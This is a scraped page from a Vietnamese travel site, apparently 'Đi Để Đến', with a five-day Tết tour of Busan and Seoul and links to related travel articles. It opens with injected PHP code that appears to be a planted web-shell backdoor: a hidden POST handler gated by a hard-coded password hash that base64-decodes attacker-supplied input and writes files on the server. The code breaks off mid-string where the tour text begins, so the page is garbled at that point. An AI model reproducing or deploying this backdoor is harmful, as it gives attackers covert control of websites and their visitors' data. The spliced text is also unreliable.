function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Tour du lịch Hàn Quốc 5N4Đ dịp Tết Nguyên Đán - Đi Để Đến

Tour du lịch Hàn Quốc 5N4Đ dịp Tết Nguyên Đán

19/12/2017 Đi Để Đến - Group

Đêm 1: TPHCM – Busan

Tối mùng 1 Tết, trưởng đoàn công ty du lịch đón quý khách tại cột 5, lầu 2, ga đi quốc tế, sân bay Tân Sơn Nhất. Trưởng đoàn làm thủ tục cho đoàn đáp chuyến bay đi Hàn Quốc. Nghỉ đêm trên máy bay.

Ngày 1: Khám phá Busan

7h10: Đến sân bay quốc tế Busan. Xe và hướng dẫn viên địa phương đón đoàn đến nhà hàng dùng điểm tâm sáng. Sau đó tham quan:

  • Công viên Youngdusan: Còn được mệnh danh là “núi đầu rồng” vì hình dáng ngọn núi có hình như đầu rồng vươn lên từ đại dương. Tại đây có hơn 70 loài thực vật, được xem là nơi nghỉ mát lý tưởng nhất thành phố Busan.
  • Tháp Busan: Cao 118 mét, đứng thứ 2 sau tháp Namsan ở Seoul. Từ trên đỉnh tháp, du khách có thể chiêm ngưỡng toàn cảnh thành phố Busan. Công ty tặng quý khách vé thang máy lên tháp.
  • Chợ Jagalchi: Là chợ hải sản tươi sống nổi tiếng và lớn nhất Hàn Quốc. Tại đây, bạn có thể nhìn thấy vô vàn các loài cá, mực, ốc, cua, ghẹ, hải sâm, bào ngư,… đặc biệt được thưởng thức món đặc sản thịt cá voi hoặc cá Mập uống chung với rượu Soju (chi phí tự túc).
  • Làng văn hóa Gamcheon: Từ một khu “ổ chuột” nhếch nhác, năm 2009, bộ du lịch Hàn Quốc đã triển khai dự án nghệ thuật để thay đổi hoàn toàn diện mạo nơi này. Đây là một trong những điểm du lịch mới nhưng luôn thu hút rất đông du khách khi đến Busan.

tour du lịch Hàn Quốc

Chợ Jagalchi là chợ cá lớn nhất Hàn Quốc – Ảnh: Internet

Trưa: Đoàn dùng cơm trưa, tiếp tục tham quan:

  • Chợ quốc tế Kukje
  • Cầu treo Gwangan: Là cây cầu bắc ngang qua biển nối các quận của thành phố Busan. Cầu treo Gwangan được xây dựng vào năm 2002 với lối thiết kế hai tầng kết hợp của một cây cầu treo và cầu kèo.
  • Bãi biển Haeundae: Dài khoảng 1,5km, là điểm dừng chân lý tưởng cho những ai yêu biển, thích nắng và muốn tránh xa phố thị.

Tối: Đoàn dùng bữa tại nhà hàng địa phương. Sau đó về khách sạn nhận phòng nghỉ ngơi.

đặt tour du lịch hàn quốc dịp tết nguyên đán 2018

Cầu treo Gwangan lộng lẫy, tráng lệ về đêm – Ảnh sưu tầm 

Ngày 2: Busan – Seoul – Công viên giải trí Seoul Land

Sáng: Đoàn dùng điểm tâm sáng tại khách sạn, làm thủ tục trả phòng.

Đoàn khởi hành về Seoul bằng tàu cao tốc KTX (thời gian di chuyển khoảng 2h30p).

Về đến trung tâm Seoul, đoàn tham quan và mua sắm tại: Trung tâm nhân sâm và cửa hàng mỹ phẩm

Trưa: Đoàn dùng bữa tại nhà hàng. Tiếp tục tham quan các địa điểm nổi tiếng trong chuyến du lịch Hàn Quốc:

  • Khu vui chơi Seoul Land: Công viên giải trí theo chủ đề đầu tiên ở Hàn Quốc, với khung cảnh đẹp được bao quanh bởi núi Cheonggyesan. Đặc biệt đến đây quý khách sẽ có cơ hội trải nghiệm môn thể thao trượt tuyết vui nhộn (công ty tặng quý khách dịch vụ ván trượt tuyết).

Tối: Đoàn dùng cơm tối tại nhà hàng. Sau đó thưởng thức Hero Painting Show hấp dẫn.

đặt tour du lịch hàn quốc giá rẻ nhất

Đến Seoul Land chơi trò trượt tuyết – Ảnh sưu tầm

Ngày 3: Seoul – Đảo Nami – Tháp Namsan

Sáng: Đoàn dùng điểm tâm, sau đó đặt chân đến:

Đảo Nami: Hòn đảo xinh đẹp giữa lòng thủ đô Seoul. Đây chính là bối cảnh của bộ phim truyền hình đình đám “Bản tình ca mùa đông”.

mua đặt tour du lịch hàn quốc giá rẻ tại dideden.com

Đảo Nami là thiên đường của tình yêu – Ảnh: Internet

Trưa: Đoàn về lại trung tâm Seoul. Tại đây dùng bữa tại nhà hàng.

Qúy khách tiếp tục ghé thăm, mua sắm ở cửa hàng Nấm Linh Chi, sâm tươi.

Tham quan, chiêm ngưỡng tháp Namsan. Dạo một vòng thành phố sôi động, hiện đại bậc nhất Hàn Quốc.

Tối: Dùng bữa và nghỉ đêm tại khách sạn ở Seoul.

Ngày 4: Khám phá Seoul

Sáng: Đoàn dùng điểm tâm sáng, sau đó tham quan:

  • Cung điện Kyeongbok (Cảnh Phúc Cung): Đây là cung điện hoàng gia nằm ở phía Bắc thủ đô Seoul, được xây dựng vào năm 1395 dưới triều vua Taejo thuộc triều đại Joseon.
  • Bảo tàng dân gia quốc gia Triều Tiên: Nơi lưu giữ, bảo tồn các di sản văn hóa của Triều Tiên với hơn 10.000 mẫu vật đại diện cho các nghi lễ, tôn giáo quan trọng.
  • Blue House: Hay còn gọi là Nhà Xanh, đây là nơi ở và làm việc của Tổng thống Hàn Quốc đương nhiệm. Qúy khách tham quan, chụp hình bên ngoài.

mua tour du lịch hàn quốc giá tốt

Suối Cheongaecheon thơ mộng là điểm đến yêu thích của nhiều du khách – Ảnh sưu tầm

Trưa: Qúy khách dùng bữa tại nhà hàng địa phương. Sau đó tiếp tục tham quan:

  • Suối Cheongaecheon: Con suối dài 5,8km giữa lòng thủ đô Seoul.
  • Quảng trường Gwanghwamun: Được xây dựng tựa như đại lộ Champ-Élysées ở Paris hay quảng trường Thiên An Môn ở Bắc Kinh. Nơi đây bao gồm nhiều công trình như đài phun nước, thảm hoa, cây xanh.
  • Siêu thị miễn thuế, cửa hàng sản phẩm nội địa đặc trưng của đất nước Hàn Quốc. Tại đây quý khách thoải mái ngắm nhìn, mua sắm.
  • Bảo tàng Rong biển: Trải nghiệm cảm giác mặc Hanbok và tham gia lớp học làm món kim chi – món ăn nổi tiếng cả thế giới.
  • Chợ Dongdaemun: Khu mua sắm lớn nhất của Hàn Quốc. Tại đây, bạn có thể tìm thấy đầy đủ các loại hàng hóa cần thiết.

Tối: Qúy khách dùng bữa tại nhà hàng địa phương. Về khách sạn nhận phòng nghỉ ngơi.

Ngày 5: Seoul – TPHCM

Sáng: Qúy khách dùng điểm tâm sáng tại khách sạn. Làm thủ tục trả phòng. Xe đưa đoàn ra sân bay Incheon, đáp chuyến bay về lại TPHCM. Về đến sân bay Tân Sơn Nhất, trưởng đoàn hỗ trợ làm thủ tục nhập cảnh và lấy hành lý. Trưởng đoàn chào tạm biệt và hẹn gặp lại quý khách trong các hành trình sau. Kết thúc tour du lịch nước ngoài dịp Tết 5N4Đ hấp dẫn.

Để xem thêm các lịch trình khác thích hợp cho bạn, có thể xem thêm cùng chúng tôi ở link sau:
>>> Chùm tour tết  <<<

  • Tour Bình Châu 1 ngày tắm suối khoáng nóng siêu độc đáo
    Tour Bình Châu 1 ngày tắm suối khoáng nóng có đang được bạn quan tâm trong chuyến du lịch Vũng Tàu sắp tới? Chắc chắn nhiều người sẽ thắc mắc rằng đi Bình Châu thì nên tham gia những hoạt động gì, ăn gì, ở đâu? Bài viết sau đây của Đi Để Đến sẽ […]
  • Tour du lịch Vũng Tàu siêu hấp dẫn trong dịp cuối năm 2023
    Tour du lịch Vũng Tàu là lựa chọn phổ biến với những ai đang cần nạp “vitamin sea”. Vũng Tàu nổi tiếng là vùng biển yên bình, thú vị và tràn đầy sức sống. Vũng Tàu cách TP.HCM khoảng 110 km và tốn thời gian di chuyển khoảng 2 giờ. Nếu bạn đang có kế […]
  • Tất tần tật kinh nghiệm đi Tà Xùa chi tiết nhất 2023
    Tà Xùa được biết đến là thiên đường săn mây đẹp nhất ở vùng núi Tây Bắc. Theo kinh nghiệm đi Tà Xùa thì nơi đây là một trong những điểm đến được giới trẻ yêu thích nhất. Tà Xùa quanh năm được bao phủ bởi mây trắng bồng bềnh trên các đỉnh núi. Bạn […]
  • Đi Phú Quốc mùa nào đẹp? Top 10 địa điểm siêu hấp dẫn
    Đi Phú Quốc mùa nào đẹp chắc hẳn là câu hỏi mà rất nhiều người đang băn khoăn! “Đảo ngọc” Phú Quốc đang là một “thiên đường nghỉ dưỡng” được rất nhiều khách du lịch trong nước và nước ngoài săn đón. Nơi đây không chỉ thu hút du khách bởi những dãy núi non […]
  • Tour Singapore 5 ngày 4 đêm – Khám phá vẻ đẹp đảo quốc sư tử
    Singapore được biết đến là một đất nước hiện đại, năng động và phát triển. Nơi đây còn nổi tiếng với nhiều danh lam thắng cảnh và ẩm thực độc đáo. Lựa chọn tour Singapore 5 ngày 4 đêm sẽ mang đến cho bạn chuyến hành trình thú vị. Cùng Đi Để Đến khám phá […]
  • Du lịch Thái Lan đi đâu? Khám phá xứ sở chùa Vàng dịp hè 2023
    Bạn có biết du lịch Thái Lan đi đâu là thú vị nhất chưa? Những năm gần đây Thái Lan đang trở thành điểm du lịch hấp dẫn. Nơi đây còn nổi tiếng với nhiều điểm vui chơi thú vị, thu hút đông đảo du khách. Những bạn lần đầu đến Thái Lan sẽ không […]